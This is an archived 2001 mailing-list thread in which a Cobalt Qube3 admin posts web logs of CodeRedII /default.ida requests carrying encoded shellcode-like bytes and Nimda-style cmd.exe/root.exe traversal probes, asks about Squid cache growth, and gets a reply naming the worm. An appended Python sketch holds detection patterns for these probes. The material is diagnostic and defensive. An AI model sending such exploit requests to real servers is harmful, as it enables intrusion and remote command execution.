
RE: [cobalt-users] Strange requests & SQUID cache cleanup on Qube3



It's called CodeRedII .. You are being attacked ..

Brian

-----Original Message-----
From: cobalt-users-admin@xxxxxxxxxxxxxxx
[mailto:cobalt-users-admin@xxxxxxxxxxxxxxx] On Behalf Of Graphics 800
Sent: Thursday, August 30, 2001 3:46 AM
To: cobalt-users@xxxxxxxxxxxxxxx
Subject: [cobalt-users] Strange requests & SQUID cache cleanup on Qube3


Hi all!

1. Every day my server is requested for a non-existing page (default.ida).
Requests (approx. 200 per day) are sent from various IP addresses with
referer 1264 or "-". Here are example lines from the "home-error" and
"home-access" files:

13:24:20 2001] [error] [client 195.206.2.21] File does not exist: /home/groups/home/web/default.ida

195.206.2.21 - - [29/Aug/2001:13:24:20 +0200] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 1264 "-" "-"

195.13.204.194 - - [29/Aug/2001:13:35:32 +0200] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 200 - "-" "-"

There are also strange requests (less frequent) made for "cmd.exe" file
from various IP:

[Sun Aug 26 00:32:42 2001] [error] [client 213.96.133.152] File does not exist: /home/groups/home/web/scripts/..ù???Æ../winnt/system32/cmd.exe
[Sun Aug 26 00:32:44 2001] [error] [client 213.96.133.152] File does not exist: /home/groups/home/web/scripts/..ü????Æ../winnt/system32/cmd.exe
[Sun Aug 26 00:32:46 2001] [error] [client 213.96.133.152] File does not exist: /home/groups/home/web/scripts/root.exe /c+dir+C:\

Can someone explain to me what the problem is?
How much do these requests (200-250 per day) enlarge my outgoing traffic?
(I've noticed significant outgoing traffic growth since these strange
requests appeared.)


2. How can I clean up the Webcache caching files? It seems that they have
grown constantly since I started Webcache, and my cache.log file is
full of warning messages. Turning Webcache off and on doesn't resolve
the problem.

2001/08/21 18:06:07| Starting Squid Cache version 2.3.STABLE3 for i586-pc-linux-gnu...
...............
2001/08/21 18:06:28| Done reading /home/squid2/cache swaplog (303058 entries)
2001/08/21 18:06:28| Finished rebuilding storage from disk.
2001/08/21 18:06:28| 303058 Entries scanned
2001/08/21 18:06:28| 0 Invalid entries.
2001/08/21 18:06:28| 0 With invalid flags.
2001/08/21 18:06:28| 303058 Objects loaded.
2001/08/21 18:06:28| 0 Objects expired.
2001/08/21 18:06:28| 0 Objects cancelled.
2001/08/21 18:06:28| 0 Duplicate URLs purged.
2001/08/21 18:06:28| 0 Swapfile clashes avoided.
2001/08/21 18:06:28| Took 21.4 seconds (14130.7 objects/sec).
2001/08/21 18:06:28| Beginning Validation Procedure
2001/08/21 18:06:30| 262144 Entries Validated so far.
2001/08/21 18:06:30| Completed Validation Procedure
2001/08/21 18:06:30| Validated 303058 Entries
2001/08/21 18:06:30| store_swap_size = 3851052k
2001/08/21 18:06:31| WARNING: Disk space over limit: 3851052 KB > 512000 KB


Thanks
Arnis

_______________________________________________
cobalt-users mailing list
cobalt-users@xxxxxxxxxxxxxxx
To Subscribe or Unsubscribe, please go to:
http://list.cobalt.com/mailman/listinfo/cobalt-users
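
A log-triage sketch for the probes quoted in the message above, added here as an example and not part of the original thread: it matches the two request patterns seen in the logs against combined-format access lines and totals the response bytes logged for them. The signature names, the 100-character filler threshold, the access-log form of the root.exe request and the 192.0.2.x sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Apache combined log format: client, timestamp, request line, status, bytes sent.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) ')

# Signatures derived from the log excerpts quoted in the message (names are hypothetical).
SIGNATURES = {
    # /default.ida? followed by a long run of one filler character, then %u escapes
    "default_ida_probe": re.compile(r"^GET /default\.ida\?(.)\1{99,}%u[0-9a-f]{4}", re.I),
    # requests for cmd.exe or root.exe, as seen under /scripts in the error log
    "cmd_root_exe_probe": re.compile(r"^GET \S*/(?:cmd|root)\.exe\b", re.I),
}

def classify(request):
    """Return the name of the first matching signature, or None."""
    for name, pattern in SIGNATURES.items():
        if pattern.search(request):
            return name
    return None

def summarize(lines):
    """Count probes per signature, with distinct clients and response bytes sent."""
    stats = defaultdict(lambda: {"hits": 0, "clients": set(), "bytes_out": 0})
    for line in lines:
        m = LOG_RE.match(line)
        name = classify(m["request"]) if m else None
        if name is None:
            continue  # unparsed line (e.g. an error_log entry) or no signature matched
        entry = stats[name]
        entry["hits"] += 1
        entry["clients"].add(m["client"])
        entry["bytes_out"] += 0 if m["size"] == "-" else int(m["size"])  # "-" = no body
    return dict(stats)

# Constructed sample lines (probe tail shortened; the 192.0.2.x lines are invented).
PROBE = "GET /default.ida?" + "X" * 224 + "%u9090%u6858%ucbd3%u7801=a HTTP/1.0"
SAMPLE = [
    f'195.206.2.21 - - [29/Aug/2001:13:24:20 +0200] "{PROBE}" 404 1264 "-" "-"',
    f'195.13.204.194 - - [29/Aug/2001:13:35:32 +0200] "{PROBE}" 200 - "-" "-"',
    '192.0.2.10 - - [29/Aug/2001:13:40:00 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1264 "-" "-"',
    '192.0.2.11 - - [29/Aug/2001:13:41:00 +0200] "GET /index.html HTTP/1.0" 200 5120 "-" "-"',
]

if __name__ == "__main__":
    for name, s in summarize(SAMPLE).items():
        print(name, s["hits"], "hits,", len(s["clients"]), "clients,", s["bytes_out"], "bytes out")
```

At the 1264 bytes logged per 404 in the excerpt, 200 such probes a day come to about 250 KB of response bodies, which the `bytes_out` total makes easy to check against a full access log.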